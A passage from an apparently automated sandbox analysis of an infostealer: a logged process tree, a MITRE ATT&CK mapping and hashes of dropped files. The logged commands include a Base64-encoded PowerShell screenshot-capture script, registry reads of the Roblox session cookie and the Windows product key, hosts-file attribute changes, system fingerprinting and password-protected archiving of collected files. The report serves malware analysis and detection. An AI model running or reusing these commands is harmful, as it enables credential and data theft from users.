      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2012
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ua3xqhg5\ua3xqhg5.cmdline"
        5⤵
        
        PID:4568
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6AEF.tmp" "c:\Users\Admin\AppData\Local\Temp\ua3xqhg5\CSC798056A1C60B43D89B72705476433D2D.TMP"
        6⤵
        
        PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2440
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:852
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1744
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2912
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Views/modifies file attributes
      PID:5032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2336
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4696
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:920
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1888
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1696
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI38722\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\KQylg.zip" *"
    3⤵
    PID:2952
  - - C:\Users\Admin\AppData\Local\Temp\_MEI38722\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI38722\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\KQylg.zip" *
      4⤵
      PID:980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4728
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1248
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:3584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
e8a95a33bdaa8522f9465fd024c3ec88

SHA1
45c15dbb8ab99be8e813aee1ed3e21ad334c8745

SHA256
06abbf9cccdf6557b1f616e0c9214c580f1d2be928104a0c8193c2217dd98c1b

SHA512
c429d8d5bfba8790a725e9d6eed656b93e69bfa8290ca388cf007aeb82462db39539ce5da4ab00c19e795344119ab14cef915c39503da80a69953e0e2ee2a002

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a807b1c91ac66f33f88a787d64904c1

SHA1
83c554c7de04a8115c9005709e5cd01fca82c5d3

SHA256
155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

SHA512
29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
00b8976ac5feade4b44ae6f492f4892c

SHA1
6fc5c2baee3b9ec88dfbd055147be64848a8e7e7

SHA256
0640e1058c896933c5ae34e8869006557ffc34fe86dfa8f8cfe3ef8c548a406d

SHA512
2fdbf41bb6297c46d9245c2fba914dedd3710cc2aa061773507bfda33cf8819f86b6bd86274064355938af262f1e1e3e0778e3200d3ee0da7b4ae42c6c0fd26b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6AEF.tmp

Filesize
1KB

MD5
b2eb03e567da9b9b7b9bdc46ad6b2406

SHA1
c9d2db04806be3103b2dcd4cf92197ed8c913dd0

SHA256
98f987de36ae219bb1a1be3998852b563b00828b252b57cebc135d2574f4e18f

SHA512
761ffb4f31e82d286c736198a9e5becb4d46f53add862eed64ff30ffcac0564b8376d381b965e42e72d88d57df8e286345e1a02a9a8d76d6019d5c354c665dce

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\_bz2.pyd

Filesize
48KB

MD5
2d461b41f6e9a305dde68e9c59e4110a

SHA1
97c2266f47a651e37a72c153116d81d93c7556e8

SHA256
abbe3933a34a9653a757244e8e55b0d7d3a108527a3e9e8a7f2013b5f2a9eff4

SHA512
eef132df6e52eb783bad3e6af0d57cb48cda2eb0edb6e282753b02d21970c1eea6bab03c835ff9f28f2d3e25f5e9e18f176a8c5680522c09da358a1c48cf14c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\_ctypes.pyd

Filesize
58KB

MD5
1adfe4d0f4d68c9c539489b89717984d

SHA1
8ae31b831b3160f5b88dda58ad3959c7423f8eb2

SHA256
64e8fd952ccf5b8adca80ce8c7bc6c96ec7df381789256fe8d326f111f02e95c

SHA512
b403cc46e0874a75e3c0819784244ed6557eae19b0d76ffd86f56b3739db10ea8deec3dc1ca9e94c101263d0ccf506978443085a70c3ab0816885046b5ef5117

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\_hashlib.pyd

Filesize
35KB

MD5
f10d896ed25751ead72d8b03e404ea36

SHA1
eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb

SHA256
3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3

SHA512
7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\_lzma.pyd

Filesize
85KB

MD5
3798175fd77eded46a8af6b03c5e5f6d

SHA1
f637eaf42080dcc620642400571473a3fdf9174f

SHA256
3c9d5a9433b22538fc64141cd3784800c567c18e4379003329cf69a1d59b2a41

SHA512
1f7351c9e905265625d725551d8ea1de5d9999bc333d29e6510a5bca4e4d7c1472b2a637e892a485a7437ea4768329e5365b209dd39d7c1995fe3317dc5aecdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\_queue.pyd

Filesize
25KB

MD5
decdabaca104520549b0f66c136a9dc1

SHA1
423e6f3100013e5a2c97e65e94834b1b18770a87

SHA256
9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84

SHA512
d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\_socket.pyd

Filesize
43KB

MD5
bcc3e26a18d59d76fd6cf7cd64e9e14d

SHA1
b85e4e7d300dbeec942cb44e4a38f2c6314d3166

SHA256
4e19f29266a3d6c127e5e8de01d2c9b68bc55075dd3d6aabe22cf0de4b946a98

SHA512
65026247806feab6e1e5bf2b29a439bdc1543977c1457f6d3ddfbb7684e04f11aba10d58cc5e7ea0c2f07c8eb3c9b1c8a3668d7854a9a6e4340e6d3e43543b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\_sqlite3.pyd

Filesize
56KB

MD5
eb6313b94292c827a5758eea82d018d9

SHA1
7070f715d088c669eda130d0f15e4e4e9c4b7961

SHA256
6b41dfd7d6ac12afe523d74a68f8bd984a75e438dcf2daa23a1f934ca02e89da

SHA512
23bfc3abf71b04ccffc51cedf301fadb038c458c06d14592bf1198b61758810636d9bbac9e4188e72927b49cb490aeafa313a04e3460c3fb4f22bdddf112ae56

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\_ssl.pyd

Filesize
62KB

MD5
2089768e25606262921e4424a590ff05

SHA1
bc94a8ff462547ab48c2fbf705673a1552545b76

SHA256
3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca

SHA512
371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\base_library.zip

Filesize
1.8MB

MD5
e17ce7183e682de459eec1a5ac9cbbff

SHA1
722968ca6eb123730ebc30ff2d498f9a5dad4cc1

SHA256
ff6a37c49ee4bb07a763866d4163126165038296c1fb7b730928297c25cfbe6d

SHA512
fab76b59dcd3570695fa260f56e277f8d714048f3d89f6e9f69ea700fca7c097d0db5f5294beab4e6409570408f1d680e8220851fededb981acb129a415358d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\blank.aes

Filesize
116KB

MD5
64e5c1ddd5f316c8385106620d6ab03d

SHA1
c51976d81fb7e85a9b83ce354a6cd162f7eebe35

SHA256
b5cb4adbe344959b04c9e6b5ad8a616a0c60fc86b042b9f1b385e367e27ebb0c

SHA512
3517d00ccf828a8d0194dca7bbbbf9d6d0fc619dd4427a8181221805de7048b721ae6da594cf6559b2de0a763ed05e5099341c1651f0360ca1daa7e6325dfb95

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\libcrypto-1_1.dll

Filesize
1.1MB

MD5
dffcab08f94e627de159e5b27326d2fc

SHA1
ab8954e9ae94ae76067e5a0b1df074bccc7c3b68

SHA256
135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15

SHA512
57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\libssl-1_1.dll

Filesize
204KB

MD5
8e8a145e122a593af7d6cde06d2bb89f

SHA1
b0e7d78bb78108d407239e9f1b376e0c8c295175

SHA256
a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1

SHA512
d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\python311.dll

Filesize
1.6MB

MD5
5792adeab1e4414e0129ce7a228eb8b8

SHA1
e9f022e687b6d88d20ee96d9509f82e916b9ee8c

SHA256
7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967

SHA512
c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\select.pyd

Filesize
25KB

MD5
90fea71c9828751e36c00168b9ba4b2b

SHA1
15b506df7d02612e3ba49f816757ad0c141e9dc1

SHA256
5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d

SHA512
e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\sqlite3.dll

Filesize
622KB

MD5
395332e795cb6abaca7d0126d6c1f215

SHA1
b845bd8864cd35dcb61f6db3710acc2659ed9f18

SHA256
8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c

SHA512
8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\tinyaes.cp311-win_amd64.pyd

Filesize
17KB

MD5
dcfc789badb7de5ac426cd130dbe2922

SHA1
bc254c63234da8a8d69f5def4df7c21cea57e4b7

SHA256
f9d5cb92f686ccb392cb08767f9164eafbf5387f47e56f81f542598aed746746

SHA512
df135ed6a005c7f1d854302bceddf3c1d311ca1a0c7ef4cfc8032d86901e048def8c3f12fd7e458057553270385cf21441bfdc557fc5a57dda2934df8cb46306

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI38722\unicodedata.pyd

Filesize
295KB

MD5
c2556dc74aea61b0bd9bd15e9cd7b0d6

SHA1
05eff76e393bfb77958614ff08229b6b770a1750

SHA256
987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d

SHA512
f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bypuonem.gnn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ua3xqhg5\ua3xqhg5.dll

Filesize
4KB

MD5
ee1fb6d1a885530db50d0b823c9e8dc5

SHA1
558db6e922e1a397ec1a55c1dfab52ff0c387763

SHA256
ec2b084b31f2bfe0db31f2f25014f10e4437dc11095815b2b910339b8ab5c796

SHA512
da605a1b1a62a78d72306ed1a757b4d318187e4945eb26f38108eed39825e6cdde6993f8f22127e7731276c4e3162ee5249cc18a2fd85af8196ebe49cbfe77ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ \Credentials\Chrome\Chrome Cookies.txt

Filesize
258B

MD5
6a32fee2ac413304a623797e06da02b4

SHA1
56815b1afa61acdf89cebf740e638b93598b3002

SHA256
4afcc1b330d93897db265b22a7afcd9581455a41386a0c547300b5739a8f4c7e

SHA512
5e18e2568f104059373ed444b3b465e2e8942f975a6e14e3d59aff789662c6c2cf49b4f114e06f4dbd903d9e4dce62c52e4e47169af6a87ea0dd57db5b7df29c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ \Directories\Desktop.txt

Filesize
539B

MD5
6dccced96523a59a4e6fcb33dcb2819d

SHA1
d7341359b29878089981d91b4f973168ab918028

SHA256
e0cc4b45c66ccaba88d6e3cffada81f54f1027d263221fba5a012ae94ac7d0e8

SHA512
ce93186dfd74a3a7b8159d2c13d3ff09678ab0e9939dc11d309c023fb94994f9e70edb1d1bafdd6bc1c588fe957de3b0c9abbd29bda4bb09d02e3212e801096d

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ \Directories\Documents.txt

Filesize
1KB

MD5
32257381e25cc5280e9e91a92dab16c8

SHA1
b14b3f86c04e05fac5c8ff7bd2159560e0764caf

SHA256
5fed32f22107c124fd0d10436e1e80e83d2fd30356913da312167f602b437049

SHA512
684992917985ec1ca3b29b869cb35b50808bf9ac02b8da9be1132f46d13f8ff2d31fdcd6a8323af6d34201cad71a6166d299e3c76c43bbcbaf7bc5f03bca7ee9

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ \Directories\Downloads.txt

Filesize
715B

MD5
1a9d2a6353d2e5ce34985d9a91f51be9

SHA1
f25b5e9c2ead73c367fd44d537dff3aa97ab4016

SHA256
